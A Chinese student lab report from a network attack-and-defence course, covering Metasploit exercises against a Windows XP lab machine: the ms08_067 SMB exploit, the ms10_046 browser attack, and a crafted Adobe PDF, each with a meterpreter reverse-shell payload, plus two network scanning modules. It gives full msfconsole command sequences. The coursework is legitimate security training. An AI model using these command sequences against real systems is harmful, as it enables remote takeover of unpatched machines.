2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础

实验内容:

  1. 一个主动攻击实践,如ms08_067(成功);
  2. 一个针对浏览器的攻击,如ms10_046(成功);
  3. 一个针对客户端的攻击,如Adobe(成功);
  4. 成功应用任何一个辅助模ipidseq(唯一)arp_sweep(成功)。

实验过程:

一、一个主动攻击实践,ms08_067。

靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)

  • 输入msfconsole进入控制台,输入search ms08_067指令查询一下针对该漏洞可以运用的攻击模块,我们可以看到在攻击模块中确实存在这样一个漏洞
exploit/windows/smb/ms08_067_netapi
  • 我们就利用这个漏洞来进行攻击,输入
use exploit/windows/smb/ms08_067_netapi
  • 输入
show payloads

来查看一下,用什么样的payload来攻击

  • 输入
set payload generic/meterpreter_reverse_tcp

来设置相关参数。

  • 我们可以输入show options来查看哪些参数需要设置

  • 使用set LHOST 192.168.16.143和set LPORT 5210设置本机地址和端口,使用set RHOST 192.168.16.145设置耙机地址

  • 接着使用exploit指令开始攻击

  • 发现攻击成功输入dir显示所有文件

二、一个针对浏览器的攻击,ms10_046。

靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
  • 输入
search ms10_046 //查询该漏洞的路径

  • 输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show payloads//漏洞相应的攻击载荷

  • 输入
set payload windows/meterpreter/reverse_tcp//设置攻击载荷的参数
set LHOST 192.168.16.143
set SRVHOST 192.168.16.143
set RHOST 192.168.16.145
exploit

  • 出现了一个URL链接入口http://192.168.16.143:80/,如图所示。

  • 在靶机中打开这个链接,弹出两个文件,打开任意一个文件。

  • 发现攻击机已经建立会话,输入sessions,输入
sessions -i 1

,打开session,成功

一个针对客户端的攻击,Adobe。

靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
  • 进入msfconsole
  • 输入
search adobe//查找与adobe有关的漏洞

  • 输入
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.154.152
set LPORT 5210
set FILENAME 20165210666.pdf
exploit

  • 在图中所显示的路径找到文件,也可以在终端输入
cp /root/.msf4/local/20165210666.pdf ~

  • 将生成的文件20165210.pdf复制到靶机中。

  • 在攻击机中回到初始界面,开始监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.16.143
set LPORT 5210
exploit

  • 成功

四、成功应用任何一个辅助模块(ipidseq唯一)(arp_sweep):

我们可以使用命令msf > show auxiliary查看所有的辅助模块:
  • ipidseq唯一
  • 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  • 先search ipidseq后选择相应模块,查看需要设置的参数

  • 设置相应的参数

  • exploit,扫描成功

  • arp_sweep
  • arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描
  • 输入
use auxiliary/scanner/discovery/arp_sweep
  • 进入模块设置参数run扫描

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

exploit既可以看成是运载恶意代码的载体,也可以理解成利用漏洞进行攻击的通道;payload是攻击的具体武器,如后门等;encode用来编码,用于伪装。

实验中遇到的问题

  1. 在主动攻击实践中,我测试了许多靶机,比如win7,win2008,winxp pattacker。都失败了,只有这个winxp sp3 英文版成功了。
  2. 在进行一个针对客户端的攻击,Adobe,我发现创建的文件按那个目录根本找不到,只有将其用命令行拷到主文件上。
  3. 端口号是必须设置的吗?我看博客中有些同学设置了有些没设置。

实验的感受和体会

本次实验做了一天一夜,尤其是在这个虚拟机花费了很多的时间,最后才发现winxp sp3英文版的可以攻击,还有就是学会了MSF工具的一些常用指令,了解了它的六个模块的用法,掌握了如何在/usr/share/metasploit-framework/modules/exploits/路径下找到相应操作系统的相关漏洞,学会了运用一些辅助模块。

离实战还缺些什么技术或步骤

怎么才能安稳的把后门文件放到靶机中,不被发现,怎么解决库的更新。

2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. mellanox RDMA RoCE

    一:首先根据系统发行版本下载对应的驱动,下载地址如下: http://www.mellanox.com/page/products_dyn?product_family=26&mtag=lin ...

  2. java 2017/6/26杂记

    mkdirs()可以建立多级文件夹, mkdir()只会建立一级的文件夹, 如下: new File("/tmp/one/two/three").mkdirs(); 执行后, 会建 ...

  3. CF1153E Serval and Snake(交互题)

    题目 CF1153E Serval and Snake 很有意思的一道交互题 做法 我们观察到,每次查询一行,当这一行仅包含一端是返回的答案是奇数 根据这个性质查询每一行每一列,我们大体能知道两端的位 ...

  4. 20145314郑凯杰 《Java程序设计》第1周学习总结

    20145314郑凯杰 <Java程序设计>第1周学习总结 教材学习内容总结 跟着教材的顺序开始总结我学过的内容: 1.三大平台 JAVA SE ,JAVA EE,JAVA ME 从毕向东 ...

  5. C++DFS方法全排列

    前几天看纪磊的<啊哈!算法>一书,里面讲算法讲的特别通俗细致,真的是初中生都能读得懂的算法书(我大二才读:P).这段代码很适合初学算法的同学. #include<iostream&g ...

  6. RN初始化环境快速配置

    1.安装node node是基于js的,node.js轻量级的Web服务器,想要是React Native跑起来需要node环境,可以去官网下载安装node.js 下载地址:https://nodej ...

  7. jsp中获取list长度

    <%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%> <%@ tag ...

  8. mybatis动态sql中的bind绑定

    知识点:bind在模糊查询中的用法 在我的博客    mybatis中使用mysql的模糊查询字符串拼接(like) 中也涉及到bind的使用 <!-- List<Employee> ...

  9. 01_MySQL DQL_基础查询

    DQL,Data Query Language,数据查询 # 基础查询/*语法:select 查询列表 from 表名: 特点:1.查询列表可以是:表中的字段,常量值.表达式.函数,也可以是多个组合2 ...

  10. Dive into Spring framework -- 搭建spring 源码的开发环境

    spring是一个类之间依赖的管理容器,大家都知道,但我们中很多人都仅仅停留在使用的层面,但spring本身具有极大的研究价值,所以在使用了几年spring之后,还是想深入的探究一下其根源.记录于此, ...